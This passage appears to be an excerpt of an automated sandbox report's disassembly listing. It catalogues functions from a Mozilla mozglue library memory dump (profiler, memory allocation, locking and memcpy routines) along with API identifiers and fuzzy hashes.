                                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BA9EBE5
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8,00000000), ref: 6BA9EC37
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BA9EC46
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6BA9EC55
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BA9EC5C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] profiler_start, xrefs: 6BA9EBB4
                                                                                                                                                                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BA9EA9B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
                                                                                                                                                                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                                      • API String ID: 2885072826-1186885292
                                                                                                                                                                                                                                      • Opcode ID: 10025132c38a6e8ab75370fac3a313eb33899285d3a630f058d8c27df6d4fab2
                                                                                                                                                                                                                                      • Instruction ID: 2271093b023a801af823087b4bdfc71923a9df3f55dc47ff9f2d973974b9fee2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10025132c38a6e8ab75370fac3a313eb33899285d3a630f058d8c27df6d4fab2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0A072209310EFDF006F69EC89B977BA4BBC2A55F04C02DE905D3241DB7AD486C7A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA20B7
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,6BA8FBD1), ref: 6BAA20C0
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6BA8FBD1), ref: 6BAA20DA
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6BA8FBD1), ref: 6BAA20F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                                      • Opcode ID: 27044a021a9a2c7c5504aa14f3b4563c6590cdd4936e70cc0e58f27c26e3bd7f
                                                                                                                                                                                                                                      • Instruction ID: 68be6d94fcb04c3f7d5cb23d64ff341fb37d4157c438df645f3b67aa808c51d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27044a021a9a2c7c5504aa14f3b4563c6590cdd4936e70cc0e58f27c26e3bd7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EE0E5355047149BCA209F36980464EBBE9FFC6214B54022AE546C3600DB79E98286E6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6BA59B2C
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6BA599CF,00000000,?), ref: 6BA59BB6
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6BA59BF8
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6BA59DE4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                                      • Opcode ID: ae54212bf48bbd9bea97dd2cb8e30ff1d4440aa4c6e9a36468f061efed713a58
                                                                                                                                                                                                                                      • Instruction ID: 09ef56cf2b543f503cce7cafc970009979d6a05c354b8357f79011864d189316
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae54212bf48bbd9bea97dd2cb8e30ff1d4440aa4c6e9a36468f061efed713a58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAD160B2A002099FDF14CF69C981AAEBBF2FF88314F194529E945AB341D735ED51CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA637F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6BAB145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6BA6380A
                                                                                                                                                                                                                                        • Part of subcall function 6BA98DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6BAB06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6BA98DCC
                                                                                                                                                                                                                                        • Part of subcall function 6BAA0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6BAA138F,?,?,?), ref: 6BAA0B80
                                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6BAA138F,?,?,?), ref: 6BAA0B27
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,6BAA138F,?,?,?), ref: 6BAA0B3F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • baseprofiler::profiler_capture_backtrace, xrefs: 6BAA0AB5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                                                                                                                                                                                      • String ID: baseprofiler::profiler_capture_backtrace
                                                                                                                                                                                                                                      • API String ID: 3592261714-147032715
                                                                                                                                                                                                                                      • Opcode ID: 23e8a39e32eef55d4daaa589e0ac1b71a4736f0cb788073e20d9e3f43efcf09f
                                                                                                                                                                                                                                      • Instruction ID: 50ba1cd084b13c4c00dc05012c709319ba1723ebf04507053cbdb0472a82c39f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e8a39e32eef55d4daaa589e0ac1b71a4736f0cb788073e20d9e3f43efcf09f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B21C4B4A002059BDF14DF68C991BBFB3B6EF85708F14446CD8169B381DB79A981CBB1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • calloc.MOZGLUE(?,?), ref: 6BA5F19B
                                                                                                                                                                                                                                        • Part of subcall function 6BA7D850: EnterCriticalSection.KERNEL32(?), ref: 6BA7D904
                                                                                                                                                                                                                                        • Part of subcall function 6BA7D850: LeaveCriticalSection.KERNEL32(?), ref: 6BA7D971
                                                                                                                                                                                                                                        • Part of subcall function 6BA7D850: memset.VCRUNTIME140(?,00000000,?), ref: 6BA7D97B
                                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6BA5F209
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                                      • API String ID: 3775194440-2564639436
                                                                                                                                                                                                                                      • Opcode ID: 2f30fc9ab90a8dc98673be40611a3c37a5a1af3c2f87630ec742a7d6af1f6c1a
                                                                                                                                                                                                                                      • Instruction ID: b2538a1ba1f6cd1676624b3cba7b005ce4b43c88f74e9dab9f0cb3bf0ee546a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f30fc9ab90a8dc98673be40611a3c37a5a1af3c2f87630ec742a7d6af1f6c1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91113637E4474986DF048F68C9611BEF3A9EF86208B05912DDC49AB212EB36DAC4C380
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MOZGLUE(?), ref: 6BA6CA26
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CAB0: EnterCriticalSection.KERNEL32(?), ref: 6BA6CB49
                                                                                                                                                                                                                                        • Part of subcall function 6BA6CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6BA6CBB6
                                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6BA6CAA2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                                      • API String ID: 3517139297-2564639436
                                                                                                                                                                                                                                      • Opcode ID: b56615727432c1402dcfea12b9e07f14003c1b727d72473eecb623142b5426fa
                                                                                                                                                                                                                                      • Instruction ID: 87cf2e221fa64a86928054aa83dbc0e04df37529c6a7e2e14984aa62061d4fdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b56615727432c1402dcfea12b9e07f14003c1b727d72473eecb623142b5426fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C11CEB2D1479893DF01DB68C8110BDF3B6EFA6204F459619DC89A7212FB34A5C5C380
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • realloc.MOZGLUE(?,?), ref: 6BA71A6B
                                                                                                                                                                                                                                        • Part of subcall function 6BA71AF0: EnterCriticalSection.KERNEL32(?), ref: 6BA71C36
                                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6BA71AE7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                                      • API String ID: 2670432147-2564639436
                                                                                                                                                                                                                                      • Opcode ID: 54789de807f9a71fd91724df0c979d4a14a29e8d60b959bf89789a0177ab6629
                                                                                                                                                                                                                                      • Instruction ID: 7698be9077ced9450c1ca19b5fa1a0884af2fb6246da25b35f0aca7a886531db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54789de807f9a71fd91724df0c979d4a14a29e8d60b959bf89789a0177ab6629
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3113635D0835893CF109FA8C8214FEF3B5EF85204F448628DD896B212EB34E5C5C380
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6BAD51C8), ref: 6BAB591A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 6BAB592B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • MOZ_SKELETON_UI_RESTARTING, xrefs: 6BAB5915
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                                                                                                      • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                                                                                                      • API String ID: 297244470-335682676
                                                                                                                                                                                                                                      • Opcode ID: bc94b37d49010d22e96c6d12f57aaf7cff20333bc38f1c5d7ece36d785d260d5
                                                                                                                                                                                                                                      • Instruction ID: 7f26a52499647d99507e7c9c12a3584a20502b1f70ea363c6d651317b89b2940
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc94b37d49010d22e96c6d12f57aaf7cff20333bc38f1c5d7ece36d785d260d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEE01A30108340BBDF005B68C91874ABBE8BB57725F488649F6B993691C7B9A8C187A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BA54E9C,?,?,?,?,?), ref: 6BA5510A
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BA54E9C,?,?,?,?,?), ref: 6BA55167
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6BA55196
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BA54E9C), ref: 6BA55234
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                                      • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                      • Instruction ID: fc7aa7099dc40306f0a6d75665dd2aa40244df3d8deda90ea56ab6cdd27b7046
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8191BB36904606CFCF14CF08C490A5ABBA2BF89318B298589ED499F315D735FD92CBE0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE7DC), ref: 6BA90918
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA909A6
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE7DC,?,00000000), ref: 6BA909F3
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA90ACB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                                      • Opcode ID: 9b6266c3734ea37ca8be118f5edbd13244036103908b0f8cda46d17953e44bf0
                                                                                                                                                                                                                                      • Instruction ID: eda139ef4f6cf2fbd036417ff07a0eec2376c93815755a852c5717e6be08d80a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b6266c3734ea37ca8be118f5edbd13244036103908b0f8cda46d17953e44bf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98512E32724714CFEF18AA19E40462A73E1EBC1FA0719817DDD6597B80DB39E8C297C1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6BA8E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6BAB5A47
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6BA8E56A,?,|UrlbarCSSSpan), ref: 6BAB5A5C
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAB5A97
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BAB5B9D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$mallocmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2682772760-0
                                                                                                                                                                                                                                      • Opcode ID: 4b530bad91349bda2aed02e2d2f4ce0360b6f3a4d50c42667f760f0eb614b675
                                                                                                                                                                                                                                      • Instruction ID: 2117abe58638a8ea63f439ee37ba7bb7d24fd8aa88563d7baa9b0988e69cb422
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b530bad91349bda2aed02e2d2f4ce0360b6f3a4d50c42667f760f0eb614b675
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49516D705087409FDB00CF29C8D471ABBE9FF89318F04C96EE9999B246D778D985CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 654c17b2664059a2cfd01e8714d445aa8987a275990506f3dd164a0cb8f7b212
                                                                                                                                                                                                                                      • Instruction ID: af3fd59be3b0d96608a289d3f6efe9d4cfe40b8d3b3d68b172e5ed72176b3707
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 654c17b2664059a2cfd01e8714d445aa8987a275990506f3dd164a0cb8f7b212
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37519FB1A00306DFDB04CF18C98478ABBB1FF48354F598269E9199B381E779E991CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6BA9FF2A), ref: 6BAADFFD
                                                                                                                                                                                                                                        • Part of subcall function 6BAA90E0: free.MOZGLUE(?,00000000,?,?,6BAADEDB), ref: 6BAA90FF
                                                                                                                                                                                                                                        • Part of subcall function 6BAA90E0: free.MOZGLUE(?,00000000,?,?,6BAADEDB), ref: 6BAA9108
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6BA9FF2A), ref: 6BAAE04A
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6BA9FF2A), ref: 6BAAE0C0
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BA9FF2A), ref: 6BAAE0FE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
